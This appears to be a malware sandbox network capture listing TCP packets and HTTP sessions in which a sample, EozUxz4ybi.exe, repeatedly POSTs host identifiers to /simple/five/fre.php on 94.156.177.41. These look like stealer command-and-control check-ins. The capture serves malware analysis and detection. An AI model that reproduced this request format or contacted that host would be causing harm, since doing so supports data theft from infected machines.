Jan 11, 2025 01:44:08.801235914 CET	80	51503	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:08.801302910 CET	51503	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:08.803481102 CET	51503	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:08.809169054 CET	80	51503	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:08.809214115 CET	51503	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:08.817154884 CET	80	51503	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:09.524636984 CET	80	51503	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:09.524771929 CET	80	51503	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:09.524805069 CET	51503	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:09.524868965 CET	51503	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:09.530127048 CET	80	51503	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:09.679352999 CET	51509	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:09.684478045 CET	80	51509	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:09.684561968 CET	51509	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:09.686638117 CET	51509	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:09.691407919 CET	80	51509	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:09.691469908 CET	51509	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:09.696289062 CET	80	51509	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:10.389856100 CET	80	51509	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:10.389930010 CET	80	51509	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:10.390017986 CET	51509	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:10.390048981 CET	51509	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:10.394926071 CET	80	51509	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:10.536984921 CET	51515	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:10.547494888 CET	80	51515	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:10.547574043 CET	51515	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:10.549809933 CET	51515	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:10.558624029 CET	80	51515	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:10.558794022 CET	51515	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:10.564361095 CET	80	51515	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:11.267416954 CET	80	51515	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:11.267558098 CET	51515	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:11.268060923 CET	80	51515	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:11.268111944 CET	51515	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:11.272507906 CET	80	51515	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:11.415715933 CET	51521	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:11.420831919 CET	80	51521	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:11.420913935 CET	51521	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:11.423024893 CET	51521	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:11.428394079 CET	80	51521	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:11.428450108 CET	51521	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:11.434075117 CET	80	51521	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:12.275295973 CET	80	51521	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:12.275424004 CET	51521	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:12.275527954 CET	80	51521	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:12.275584936 CET	51521	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:12.280353069 CET	80	51521	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:12.433877945 CET	51531	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:12.438777924 CET	80	51531	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:12.438859940 CET	51531	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:12.440880060 CET	51531	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:12.445671082 CET	80	51531	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:12.445729017 CET	51531	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:12.450562954 CET	80	51531	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:13.185780048 CET	80	51531	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:13.185923100 CET	80	51531	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:13.186095953 CET	51531	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:13.186275959 CET	51531	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:13.191087961 CET	80	51531	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:13.337127924 CET	51537	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:13.342123032 CET	80	51537	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:13.345189095 CET	51537	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:13.347202063 CET	51537	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:13.352051020 CET	80	51537	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:13.353272915 CET	51537	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:13.358120918 CET	80	51537	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:14.053210020 CET	80	51537	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:14.053369045 CET	80	51537	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:14.053421021 CET	51537	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:14.053493977 CET	51537	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:14.058322906 CET	80	51537	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:14.194591045 CET	51544	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:14.199621916 CET	80	51544	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:14.199755907 CET	51544	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:14.201705933 CET	51544	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:14.206522942 CET	80	51544	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:14.206617117 CET	51544	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:14.211488008 CET	80	51544	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:14.935020924 CET	80	51544	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:14.935163975 CET	80	51544	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:14.935173035 CET	51544	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:14.935240030 CET	51544	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:14.940026999 CET	80	51544	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:15.076941967 CET	51550	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:15.081876040 CET	80	51550	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:15.081954956 CET	51550	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:15.083908081 CET	51550	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:15.088762999 CET	80	51550	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:15.088828087 CET	51550	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:15.093705893 CET	80	51550	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:15.838354111 CET	80	51550	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:15.838469982 CET	80	51550	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:15.838515043 CET	51550	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:15.838515997 CET	51550	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:15.843354940 CET	80	51550	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:16.003818989 CET	51557	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.008610964 CET	80	51557	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:16.008663893 CET	51557	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.010884047 CET	51557	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.015631914 CET	80	51557	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:16.015685081 CET	51557	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.020447016 CET	80	51557	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:16.721132994 CET	80	51557	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:16.721393108 CET	51557	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.723731995 CET	80	51557	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:16.723808050 CET	51557	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.728116989 CET	80	51557	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:16.858210087 CET	51565	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.863413095 CET	80	51565	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:16.863492012 CET	51565	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.865232944 CET	51565	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.870196104 CET	80	51565	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:16.870270014 CET	51565	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:16.875386953 CET	80	51565	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:17.604012966 CET	80	51565	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:17.604119062 CET	51565	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:17.604171991 CET	80	51565	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:17.604212999 CET	51565	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:17.609005928 CET	80	51565	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:17.763300896 CET	51571	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:17.768315077 CET	80	51571	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:17.768402100 CET	51571	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:17.771429062 CET	51571	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:17.776393890 CET	80	51571	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:17.776453972 CET	51571	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:17.781348944 CET	80	51571	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:18.481522083 CET	80	51571	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:18.481606007 CET	80	51571	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:18.481641054 CET	51571	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:18.481703997 CET	51571	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:18.486525059 CET	80	51571	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:18.892911911 CET	51577	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:18.897749901 CET	80	51577	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:18.897819042 CET	51577	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:18.900230885 CET	51577	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:18.905059099 CET	80	51577	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:18.905117035 CET	51577	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:18.909972906 CET	80	51577	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:19.611534119 CET	80	51577	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:19.611560106 CET	80	51577	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:19.611694098 CET	51577	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:19.611742973 CET	51577	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:19.616542101 CET	80	51577	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:19.752892971 CET	51581	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:19.757946968 CET	80	51581	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:19.758064985 CET	51581	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:19.760009050 CET	51581	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:19.764894009 CET	80	51581	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:19.764965057 CET	51581	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:19.769912004 CET	80	51581	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:20.465841055 CET	80	51581	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:20.465954065 CET	80	51581	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:20.466095924 CET	51581	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:20.466202974 CET	51581	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:20.471075058 CET	80	51581	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:20.613390923 CET	51582	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:20.618434906 CET	80	51582	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:20.618583918 CET	51582	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:20.620706081 CET	51582	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:20.625672102 CET	80	51582	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:20.625880957 CET	51582	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:20.630822897 CET	80	51582	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:21.591641903 CET	80	51582	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:21.591666937 CET	80	51582	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:21.591680050 CET	80	51582	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:21.591734886 CET	80	51582	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:21.591883898 CET	51582	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:21.591883898 CET	51582	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:21.591883898 CET	51582	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:21.596714973 CET	80	51582	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:21.725527048 CET	51583	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:21.730679035 CET	80	51583	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:21.730803967 CET	51583	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:21.732814074 CET	51583	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:21.737637997 CET	80	51583	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:21.737699986 CET	51583	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:21.742543936 CET	80	51583	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:22.440511942 CET	80	51583	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:22.440615892 CET	51583	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:22.440624952 CET	80	51583	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:22.440668106 CET	51583	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:22.445569038 CET	80	51583	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:22.595025063 CET	51584	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:22.600199938 CET	80	51584	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:22.600321054 CET	51584	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:22.602380991 CET	51584	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:22.607300997 CET	80	51584	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:22.607372999 CET	51584	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:22.612381935 CET	80	51584	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:23.341622114 CET	80	51584	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:23.341759920 CET	80	51584	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:23.341845989 CET	51584	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:23.341907978 CET	51584	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:23.346760988 CET	80	51584	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:23.502188921 CET	51585	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:23.507136106 CET	80	51585	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:23.509182930 CET	51585	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:23.511257887 CET	51585	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:23.516045094 CET	80	51585	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:23.517155886 CET	51585	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:23.521920919 CET	80	51585	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:24.227340937 CET	80	51585	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:24.227418900 CET	80	51585	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:24.227497101 CET	51585	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:24.227519989 CET	51585	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:24.233684063 CET	80	51585	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:24.349975109 CET	51586	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:24.354939938 CET	80	51586	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:24.355515957 CET	51586	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:24.357515097 CET	51586	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:24.362418890 CET	80	51586	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:24.362510920 CET	51586	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:24.369163036 CET	80	51586	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:25.071022034 CET	80	51586	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:25.071055889 CET	80	51586	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:25.071196079 CET	51586	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:25.071264982 CET	51586	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:25.076049089 CET	80	51586	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:25.195159912 CET	51587	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:25.200387955 CET	80	51587	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:25.200558901 CET	51587	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:25.202620029 CET	51587	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:25.207501888 CET	80	51587	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:25.207597971 CET	51587	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:25.212487936 CET	80	51587	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:25.895649910 CET	80	51587	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:25.895720005 CET	80	51587	94.156.177.41	192.168.2.8
Jan 11, 2025 01:44:25.895893097 CET	51587	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:25.897126913 CET	51587	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:44:25.902384996 CET	80	51587	94.156.177.41	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:43:02.900701046 CET	53	59773	162.159.36.2	192.168.2.8
Jan 11, 2025 01:43:03.548760891 CET	53	62713	1.1.1.1	192.168.2.8

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:20.812382936 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 180 Connection: close
Jan 11, 2025 01:42:20.817287922 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.ruhubert376483HUBERT-PCk0FDD42EE188E931437F4FBE2CEmz9v
Jan 11, 2025 01:42:21.548294067 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49705	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:22.233244896 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 180 Connection: close
Jan 11, 2025 01:42:22.238847971 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.ruhubert376483HUBERT-PC+0FDD42EE188E931437F4FBE2CRv9Cl
Jan 11, 2025 01:42:22.950077057 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49706	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:23.035248995 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:23.040246964 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:23.762090921 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49707	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:23.915548086 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:23.920672894 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:24.642745018 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49708	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:25.192168951 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:25.197135925 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:25.937805891 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49709	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:26.097378969 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:26.102355003 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:26.818130016 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49710	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:26.963864088 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:26.968789101 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
